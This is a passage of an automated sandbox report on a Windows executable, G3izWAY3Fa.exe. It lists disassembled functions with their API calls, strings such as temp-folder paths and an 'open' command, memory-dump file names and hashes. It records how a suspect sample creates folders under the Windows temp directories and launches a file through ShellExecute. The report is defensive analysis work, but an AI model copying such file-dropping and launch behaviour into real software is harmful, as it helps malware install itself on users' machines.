Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37

Strings

open, xrefs: 00401750, 00401759, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2
open C:\Windows\temp\Edit9, xrefs: 00401801, 0040181D
C:\Windows\temp, xrefs: 00401761

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Windows\temp$open$open C:\Windows\temp\Edit9
API String ID: 1941528284-3341607499
Opcode ID: 19fc4884e146a1ae1ba978f5a010e4346a4a04167c84060e6bd2cb96d6f55c18
Instruction ID: 7896ef4f757b45501086316f909c91b804aeab5b8a53035332c5850d51b772f7
Opcode Fuzzy Hash: 19fc4884e146a1ae1ba978f5a010e4346a4a04167c84060e6bd2cb96d6f55c18
Instruction Fuzzy Hash: FA41C272900615BACF10BBA5DD46EAF3A79EF01329B20433BF515F11E1D63C4A419AAD

Function 00402E5B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EB9
GetTickCount.KERNEL32 ref: 00402F3A
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F67
wsprintfA.USER32 ref: 00402F77
WriteFile.KERNELBASE(00000000,00000000,0040F020,00000000,00000000), ref: 00402FA3

Strings

... %d%%, xrefs: 00402F71

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%
API String ID: 4209647438-2449383134
Opcode ID: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
Instruction ID: 77f196e3f4de2b0f7ff2a56d5fa3bb7e3b28ee40e2402e388f788a2720e93e15
Opcode Fuzzy Hash: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
Instruction Fuzzy Hash: F151917190121A9BCF10CF55DA48AAF7B78AF04795F10413BF810B72C0D7B89E50DBAA

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405564: CharNextA.USER32(00405316,?,00421880,00000000,004055C8,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405572
Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Windows\temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Windows\temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Windows\temp
API String ID: 3751793516-823764690
Opcode ID: c26435dd92f2a1108dda5f18212d644254b55bfd3cfdadd86ae1b21390b81dbb
Instruction ID: ffaaac8e814952d4dd163c137c14166a37b00a477d69e33f5cc6849720afcf5a
Opcode Fuzzy Hash: c26435dd92f2a1108dda5f18212d644254b55bfd3cfdadd86ae1b21390b81dbb
Instruction Fuzzy Hash: 86010831908180ABDB116F795D44D6F27B0DA52365728473BF491B22E2C23C4942962E

Function 004056E3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004056F6
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405710

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004056E3, 004056E6
"C:\Users\user\Desktop\G3izWAY3Fa.exe", xrefs: 004056EA
nsa, xrefs: 004056EF

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2753553320
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 090c9869d25c952b380026dfe3028592f3e254e5657c021594612e0629f183dd
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: AFF0A736348204B7D7104F55EC04B9B7F5DDF91750F14C027F944DA1C0D6B1995597A5

Function 00403097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 004030B8

Strings

1033, xrefs: 004030BF
C:\Users\user\AppData\Local\Temp\, xrefs: 00403098, 0040309D, 004030A3, 004030AF, 004030B7, 004030BE

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-3283962145
Opcode ID: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
Instruction ID: 14cf73edb083f9294524d0cb591bdba299ebaa8e37fda96f2dae1f3ab35ccfa6
Opcode Fuzzy Hash: 6fc6148b77ece9d346d6d7cc43375dab10df03dac4f70bfb46dffa123947e942
Instruction Fuzzy Hash: 95D0C92160BD3032D66136263D0AFDF155C8F5236EFA1447BF809B61CA5B6C6A8219FF

Function 004063DD Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
Instruction ID: 95af8839098f806f541805b71f16133a603fad5641f47eebb8f014e75b9041d1
Opcode Fuzzy Hash: 8ad8b3a7fce677aa33c13c02e3180aa90519ee056083dbfcd0f6a1ae91265e6c
Instruction Fuzzy Hash: 58A13371D00229CBDF28CFA8C8447ADBBB1FF44305F25856AD856BB281D7789A86DF44

Function 004065DE Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
Instruction ID: 736e54d1ea8bc2ffbcc58a3ee687e8f06aed80bce92bf0dad63538ea203c4f31
Opcode Fuzzy Hash: b486484d64dd4cde6c37fee08c13c94b86683911648eeb5affe32ba80e56590e
Instruction Fuzzy Hash: 77913271D00229CBDF28CF98C844BADBBB1FF44305F15816AD856BB281D7789A86DF54

Function 004062F4 Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
Instruction ID: c975835c63a62796fcb7e955cfffcd5e326eaa1512836fcadbce1623bdfadb04
Opcode Fuzzy Hash: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
Instruction Fuzzy Hash: AF816671D00229CFDF24CFA8C8447AEBBB1FB44305F25816AD856BB281C7789A86DF54

Function 00405DF9 Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
Instruction ID: 0ba87498709856dc17a0c5f751d6ecfe3ae25d7b1153355424f504aba8ac83cf
Opcode Fuzzy Hash: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
Instruction Fuzzy Hash: B4817772D04229CBDF24CFA8C8447AEBBB0FB44305F25816AD856BB2C0D7785A86DF44

Function 00406247 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
Instruction ID: 47c5cb8fc101d284839cddc633a7ca9263ac2e2456f843b1234a04abf02d33d1
Opcode Fuzzy Hash: ab0e96aa9de7783a5fbfa8537471c17f47562fab6ccc56c1d015952012775d3a
Instruction Fuzzy Hash: 0C713371D00229CBDF28CFA8C844BADBBF1FB44305F15806AD816BB281D7785A86DF54

Function 00406365 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
Instruction ID: aa40489b15165fca9e2d73c9723ecf3d5b4a768092768a0400057c9dc9ec6b69
Opcode Fuzzy Hash: 204a14aa4723f8bacec733d7555320540fe203445ac57d520a52ca53e11fdb0c
Instruction Fuzzy Hash: F6714471D04229CFDF28CF98C844BAEBBB1FB44305F25816AD816BB281D7785A86DF54

Function 004062B1 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
Instruction ID: f7c6f07f586ed293a1c67bf574783cb577a0acbc2814a7f5ecfd539a56c9ebac
Opcode Fuzzy Hash: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
Instruction Fuzzy Hash: AF715671D00229CBDF28CF98C844BADBBB1FF44305F15816AD816BB281C7785A46DF54

Function 00401DC1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Windows\temp,?), ref: 00401E07

Strings

C:\Windows\temp, xrefs: 00401DF2

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Windows\temp
API String ID: 587946157-823764690
Opcode ID: 92d2050c37f50ba05e813603419f61aaf560cdca42c4badea36c2296db382889
Instruction ID: e1c53a3b58ef05eba024da23075f8ab054487d32240d7e587a4224b468346741
Opcode Fuzzy Hash: 92d2050c37f50ba05e813603419f61aaf560cdca42c4badea36c2296db382889
Instruction Fuzzy Hash: 87F0C872B04201AAC7516FB59D4AA5E2AA8AB41398F200637F510F61C1D9BD8841A658

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
